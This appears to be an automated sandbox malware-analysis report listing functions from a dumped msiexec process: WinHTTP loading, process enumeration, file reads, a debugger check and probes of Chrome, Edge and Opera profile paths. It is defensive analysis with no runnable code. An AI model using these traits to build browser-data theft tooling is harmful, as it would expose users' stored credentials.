                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddrFormatFreeInfoMessageclosesocketconnectgetaddrinfosocket
                                                                                                                                                                                                          • String ID: getaddrinfo: %s
                                                                                                                                                                                                          • API String ID: 1733616599-4118680637
                                                                                                                                                                                                          • Opcode ID: 96966bbb9f4fd2d0a098b9bb0d1e5808fc7f597d2034337b133cb5fe35094464
                                                                                                                                                                                                          • Instruction ID: 8509d85270973a8de6a6eb0b523b5cc98d37b9fc2bdbc80af7bda7b9025d4557
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 96966bbb9f4fd2d0a098b9bb0d1e5808fc7f597d2034337b133cb5fe35094464
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF110233A40215ABEB218EA09C40FAA7379AB45B30F100628FB2DA33C0DB31A9118795
                                                                                                                                                                                                          Function 214D2B20 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 195COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 1042 214d2b20-214d2b73 call 214eff70 call 214d7310 1047 214d2b75-214d2b91 call 214d3dc0 1042->1047 1048 214d2b96-214d2be7 1042->1048 1052 214d2d87-214d2da1 call 214d36c0 1047->1052 1057 214d2bee-214d2bf0 1048->1057 1058 214d2c08-214d2c13 1057->1058 1059 214d2bf2-214d2c03 GetLastError call 214d37e0 1057->1059 1058->1059 1063 214d2c15-214d2c40 1058->1063 1059->1052 1065 214d2d5b-214d2d82 call 214d37e0 call 214d36c0 1063->1065 1066 214d2c46-214d2c51 1063->1066 1065->1052 1066->1065 1069 214d2c57-214d2c72 1066->1069 1073 214d2c74-214d2c79 1069->1073 1074 214d2cd2-214d2ce8 call 214d2db0 1069->1074 1077 214d2c80-214d2c85 1073->1077 1082 214d2d4f-214d2d56 call 214d36c0 1074->1082 1083 214d2cea-214d2cf0 1074->1083 1077->1074 1080 214d2c87-214d2ca4 1077->1080 1091 214d2ca6-214d2cc1 call 214d3570 1080->1091 1092 214d2cc3-214d2cd0 1080->1092 1082->1065 1084 214d2d34-214d2d4a call 214d40f0 1083->1084 1085 214d2cf2-214d2cfb 1083->1085 1084->1082 1088 214d2cfd-214d2d00 1085->1088 1089 214d2d2b-214d2d31 call 214da956 1085->1089 1094 214d2d07-214d2d0c 1088->1094 1095 214d2d02 call 214ddaab 1088->1095 1089->1084 1091->1080 1091->1092 1092->1074 1092->1077 1100 214d2d0e call 214ddaab 1094->1100 1101 214d2d13-214d2d18 1094->1101 1095->1094 1100->1101 1104 214d2d1f-214d2d22 1101->1104 1105 214d2d1a call 214ddaab 1101->1105 1106 214d2d29 1104->1106 1107 214d2d24 call 214ddaab 1104->1107 1105->1104 1106->1089 1107->1106
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 214D7310: LoadLibraryW.KERNEL32(winhttp.dll,?,214D2B6F), ref: 214D7316
                                                                                                                                                                                                            • Part of subcall function 214D7310: GetProcAddress.KERNEL32(00000000,WinHttpOpen), ref: 214D7333
                                                                                                                                                                                                            • Part of subcall function 214D7310: GetProcAddress.KERNEL32(00000000,WinHttpConnect), ref: 214D7340
                                                                                                                                                                                                            • Part of subcall function 214D7310: GetProcAddress.KERNEL32(00000000,WinHttpOpenRequest), ref: 214D734D
                                                                                                                                                                                                            • Part of subcall function 214D7310: GetProcAddress.KERNEL32(00000000,WinHttpSendRequest), ref: 214D735A
                                                                                                                                                                                                            • Part of subcall function 214D7310: GetProcAddress.KERNEL32(00000000,WinHttpReceiveResponse), ref: 214D7367
                                                                                                                                                                                                            • Part of subcall function 214D7310: GetProcAddress.KERNEL32(00000000,WinHttpQueryDataAvailable), ref: 214D7374
                                                                                                                                                                                                            • Part of subcall function 214D7310: GetProcAddress.KERNEL32(00000000,WinHttpReadData), ref: 214D7381
                                                                                                                                                                                                            • Part of subcall function 214D7310: GetProcAddress.KERNEL32(00000000,WinHttpCloseHandle), ref: 214D738E
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 214D2BF2
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$ErrorLastLibraryLoad
                                                                                                                                                                                                          • String ID: /json$GET$WebClient/1.0$localhost
                                                                                                                                                                                                          • API String ID: 856020675-4094957224
                                                                                                                                                                                                          • Opcode ID: 40afa7a1d7fb0a9e337590c4f55c3cfae0086d2bcfa0e983d992658930d913ee
                                                                                                                                                                                                          • Instruction ID: 3188f2da11ab2ceae01ac7949c571875a18076157726c0bcd1e5d5479354b640
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40afa7a1d7fb0a9e337590c4f55c3cfae0086d2bcfa0e983d992658930d913ee
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B6616471A4024A9FEF10DFA4CC58FEEBBB8AF15704F104129E909A73C1DB799605CB61
                                                                                                                                                                                                          Function 214D76D0 Relevance: 7.6, APIs: 5, Instructions: 141processCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 214D7722
                                                                                                                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 214D7744
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 214D774F
                                                                                                                                                                                                          • Process32NextW.KERNEL32(?,0000022C), ref: 214D784F
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 214D7861
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1789362936-0
                                                                                                                                                                                                          • Opcode ID: a02de44b51dd78cbdd512fc88d4527bee455bc4de4658358871a0d3e6da87331
                                                                                                                                                                                                          • Instruction ID: caad754cb531c1d3d98140a73a67fa0ad94acc3400c3712a30732b63bcd2ddc2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a02de44b51dd78cbdd512fc88d4527bee455bc4de4658358871a0d3e6da87331
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C3518D72D00219DFCB21CF98C894BAEBBB5FB49715F118659E918A7380D735AA05CBA0
                                                                                                                                                                                                          Function 214D7A40 Relevance: 7.6, APIs: 5, Instructions: 68fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,00000000,?,?,214D1539,?,00000000,000000FF,?), ref: 214D7A5B
                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,214D1539,?,00000000,000000FF,?,00000000,000000FF,?,00000000), ref: 214D7A6C
                                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,214D1539,?,00000000,000000FF), ref: 214D7AB8
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,?,?,214D1539,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF), ref: 214D7AC4
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,?,?,214D1539,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF), ref: 214D7AD2
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$CloseHandle$CreateReadSize
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3664964396-0
                                                                                                                                                                                                          • Opcode ID: 08fb0cd4c53db40bd8e81095239df178772891d3a4315fbf09a8d27551e2bf93
                                                                                                                                                                                                          • Instruction ID: 4385c8eac7c3f293fa68b61c8dd51119e2136bc0069cfae0ec26bf0d924a19aa
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08fb0cd4c53db40bd8e81095239df178772891d3a4315fbf09a8d27551e2bf93
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A11C472240310BFE7304EA89C45F677BACEB46B65F10055DFA09973C1DBB45A01C7A2
                                                                                                                                                                                                          Function 214D6220 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 124COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(?,\Google\Chrome\Application\Chrome.exe,00000025), ref: 214D634E
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExistsFilePath
                                                                                                                                                                                                          • String ID: (x86)$ProgramFiles$\Google\Chrome\Application\Chrome.exe
                                                                                                                                                                                                          • API String ID: 1174141254-1866107781
                                                                                                                                                                                                          • Opcode ID: a6576951c32ca03e7cf9a4477fdde4c2745c17fbca7cd1e68fb98b0b1ef06c89
                                                                                                                                                                                                          • Instruction ID: 75f804b1dfe095596a92f6cb2e602960a5d9a7028d990f805eac2c03082339b5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a6576951c32ca03e7cf9a4477fdde4c2745c17fbca7cd1e68fb98b0b1ef06c89
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64418072A10205AFDF04DFA8DC64FAEBBB9FF51704F54051DE409A7390DB3899068B91
                                                                                                                                                                                                          Function 214D6120 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(-00000002,\Opera Software\Opera Stable,?,00000000,-00000002,00000000), ref: 214D61BB
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExistsFilePath
                                                                                                                                                                                                          • String ID: AppData$\Opera Software\Opera Stable$|}O!
                                                                                                                                                                                                          • API String ID: 1174141254-3331217881
                                                                                                                                                                                                          • Opcode ID: d50cdc36108fdea53509ddd9dd2dbc9f70b3ec29383d6b910e1e3866cb0a1e76
                                                                                                                                                                                                          • Instruction ID: 030706f66854355414fd6eebfe62c1ea4e98fab3ec4e6b2346c6a8576f547a98
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d50cdc36108fdea53509ddd9dd2dbc9f70b3ec29383d6b910e1e3866cb0a1e76
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A42181B6D00205EECF14DFB8C865BAEBBB8EF18705F50851DD819A7380DB74A5058BA0
                                                                                                                                                                                                          Function 214D6020 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(-00000002,\AppData\Local\Microsoft\Edge\,0000001E,00000000,-00000002,00000000), ref: 214D60BB
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExistsFilePath
                                                                                                                                                                                                          • String ID: ,}O!$UserProfile$\AppData\Local\Microsoft\Edge\
                                                                                                                                                                                                          • API String ID: 1174141254-892775517
                                                                                                                                                                                                          • Opcode ID: fba937cc3bce98ea4879423b5b10393baa41881bf6f332ac220aaddb5bdb5c1c
                                                                                                                                                                                                          • Instruction ID: a81aecf1c4348fdf226b73aa4d3496c14c132026357d785dd79e3bdce3fd1ae3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fba937cc3bce98ea4879423b5b10393baa41881bf6f332ac220aaddb5bdb5c1c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 932192B6D00205DBCF15DFA8C865BAEB7F8EF18705F10851DD91AA3780DB74A5058BA1
                                                                                                                                                                                                          Function 214D63B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 77COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(-00000002,\Microsoft\Edge\Application\msedge.exe,00000026,00000000,-00000002), ref: 214D644B
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • \Microsoft\Edge\Application\msedge.exe, xrefs: 214D642B
                                                                                                                                                                                                          • ProgramFiles, xrefs: 214D63D6
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExistsFilePath
                                                                                                                                                                                                          • String ID: ProgramFiles$\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                          • API String ID: 1174141254-1265440269
                                                                                                                                                                                                          • Opcode ID: 795b700ca97ca2dcb1aef8d5b91e926f8a2e5575e2815bcff132e5a4ebf464dc
                                                                                                                                                                                                          • Instruction ID: 17558e9a1a03b8c54c14e786a34d61cf896b4a15c7e8a4bd4df111bf06bed421
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 795b700ca97ca2dcb1aef8d5b91e926f8a2e5575e2815bcff132e5a4ebf464dc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F21B572D00205DBCF14DFA8C855BAFB7F9EF14704F10852ED819A3780D774A9058BA4
                                                                                                                                                                                                          Function 214D5F20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 77COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(-00000002,\AppData\Local\Google\Chrome\,0000001D,00000000,-00000002), ref: 214D5FBB
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExistsFilePath
                                                                                                                                                                                                          • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                                                                                                                                                          • API String ID: 1174141254-4188645398
                                                                                                                                                                                                          • Opcode ID: ec68b575bf2b49eed1073bf2df05666660a14af6be8448f1f04535301a95194a
                                                                                                                                                                                                          • Instruction ID: edfedafaf49b6f1dd4839c4df52e2410cfe807a84f951d227dc56328189b51e9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec68b575bf2b49eed1073bf2df05666660a14af6be8448f1f04535301a95194a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F221C7B2D00205DFCF14DFA8C865BAEBBF8EF18705F50855DD419A7380DB7495058B90
                                                                                                                                                                                                          Function 214E5A65 Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000000,?,214ECD2C,?,00000000,?,00000000,?,214ECD53,?,00000007,?,?,214EA21D,?), ref: 214E5A7B
                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,214ECD2C,?,00000000,?,00000000,?,214ECD53,?,00000007,?,?,214EA21D,?,?), ref: 214E5A8D
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 485612231-0
                                                                                                                                                                                                          • Opcode ID: 9f5377b7e3093debef2563db09d5357d59ed5ae5e5c3698cea8675fd2472e90a
                                                                                                                                                                                                          • Instruction ID: b6c60fe7b63cdbb9e2484a08962184d321428f081a48291381bc53041de4acc5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f5377b7e3093debef2563db09d5357d59ed5ae5e5c3698cea8675fd2472e90a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86E0E676140325AFDB115FA4980CF553FA9AB50756F104428FA5C96251DA35D5A0C7C8
                                                                                                                                                                                                          Function 214D7DE0 Relevance: 1.3, APIs: 1, Instructions: 28sleepCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 214D7E20: FindFirstFileW.KERNEL32(?,?,?,00000000,75080F00), ref: 214D7ED1
                                                                                                                                                                                                            • Part of subcall function 214D7E20: FindNextFileW.KERNELBASE(00000000,?,?,00000000,75080F00), ref: 214D7F0A
                                                                                                                                                                                                          • Sleep.KERNEL32(0000000A), ref: 214D7E03
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileFind$FirstNextSleep
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2635277345-0
                                                                                                                                                                                                          • Opcode ID: 77c59290013282274d48a479d379334728ff2681192f01dea8213d2348cb284e
                                                                                                                                                                                                          • Instruction ID: 073c46d3b577e218a2e17f997cd13a9909c2ea95f5d38e876a246dea5fb0c316
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77c59290013282274d48a479d379334728ff2681192f01dea8213d2348cb284e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21E086337002146B9A01D6AEDC91D5AF7EEDB95675B51007EEE0CD3300E871DD0182E1

                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                          Function 214D73F0 Relevance: 9.2, APIs: 6, Instructions: 215fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 214D744D
                                                                                                                                                                                                          • CreateFileW.KERNEL32(000000FF,80000000,?,00000000,00000003,00000080,00000000), ref: 214D75C9
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 214D765E
                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 214D7665
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseFileFind$CreateFirstHandle
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3283578348-0
                                                                                                                                                                                                          • Opcode ID: bc74a36b7c45887f2e6168d205ffe030d82c8ddc173ecc2df2061bd12d7f1877
                                                                                                                                                                                                          • Instruction ID: d2ebb1eeabd8a7fa84a77057977c557cd6f6f1670419c8908317c252e9fcd6ae
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc74a36b7c45887f2e6168d205ffe030d82c8ddc173ecc2df2061bd12d7f1877
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE81D372D002099EDF01CFA4C864FEE7BB5EF25719F600519D90DE7290D7359A45CB60
                                                                                                                                                                                                          Function 214DAFD4 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 214DAFE1
                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,00000017,?), ref: 214DB0A9
                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,00000017,?), ref: 214DB0C8
                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,00000017,?), ref: 214DB0D2
                                                                                                                                                                                                          Memory Dump Source
